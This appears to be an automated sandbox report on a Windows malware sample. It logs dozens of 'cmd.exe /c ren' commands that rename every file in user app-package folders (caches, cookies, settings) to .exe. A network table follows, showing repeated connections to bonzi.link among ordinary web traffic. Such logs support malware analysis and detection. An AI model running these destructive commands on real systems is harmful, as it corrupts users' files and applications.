"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows_ie_ac_001\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.206:443 apis.google.com udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 216.58.213.14:443 clients2.google.com udp
N/A 224.0.0.251:5353 udp
GB 216.58.213.14:443 clients2.google.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.213.14:443 consent.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 bonzi.link udp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 142.250.200.3:80 www.gstatic.com tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 id.google.com udp
GB 142.250.200.35:443 id.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.204.86:443 i.ytimg.com tcp
GB 216.58.204.86:443 i.ytimg.com tcp
US 8.8.8.8:53 86.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.179.238:443 www.youtube.com tcp
GB 216.58.204.86:443 i.ytimg.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 172.217.16.234:443 jnn-pa.googleapis.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 2.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
GB 142.250.200.46:443 www.youtube.com udp
GB 142.250.200.46:443 www.youtube.com tcp
US 8.8.8.8:53 104.246.116.51.in-addr.arpa udp
GB 142.250.200.35:443 id.google.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.200.35:443 id.google.com udp
GB 216.58.204.86:443 i.ytimg.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
GB 172.217.16.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
GB 216.58.201.110:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 216.58.201.110:443 encrypted-vtbn0.gstatic.com udp
US 8.8.8.8:53 google.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp
GB 142.250.179.238:443 google.com tcp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
GB 172.217.16.234:443 jnn-pa.googleapis.com udp
GB 216.58.201.110:443 encrypted-vtbn0.gstatic.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.179.238:443 google.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 e2c33.gcp.gvt2.com udp
GB 142.250.200.54:443 i.ytimg.com udp
JP 35.213.86.143:443 e2c33.gcp.gvt2.com tcp
JP 35.213.86.143:443 e2c33.gcp.gvt2.com tcp
GB 142.250.179.238:443 google.com udp
US 8.8.8.8:53 143.86.213.35.in-addr.arpa udp
US 8.8.8.8:53 54.200.250.142.in-addr.arpa udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
GB 172.217.16.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 any.run udp
US 172.67.20.89:443 any.run tcp
US 172.67.20.89:443 any.run tcp
US 8.8.8.8:53 89.20.67.172.in-addr.arpa udp
US 8.8.8.8:53 counter.any.run udp
US 8.8.8.8:53 analytics.any.run udp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 216.239.32.36:443 region1.analytics.google.com tcp
BE 64.233.166.156:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 72.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 66.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 156.166.233.64.in-addr.arpa udp
US 8.8.8.8:53 cllctr.any.run udp
US 8.8.8.8:53 clients2.google.com udp
GB 216.58.213.14:443 clients2.google.com udp
GB 216.58.213.14:443 clients2.google.com tcp
GB 142.250.200.54:443 i.ytimg.com udp
US 8.8.8.8:53 static.doubleclick.net udp
GB 216.58.213.6:443 static.doubleclick.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 185.199.110.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 21.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 beacons2.gvt2.com udp
MX 192.178.57.35:443 beacons2.gvt2.com tcp
MX 192.178.57.35:443 beacons2.gvt2.com tcp
MX 192.178.57.35:443 beacons2.gvt2.com udp
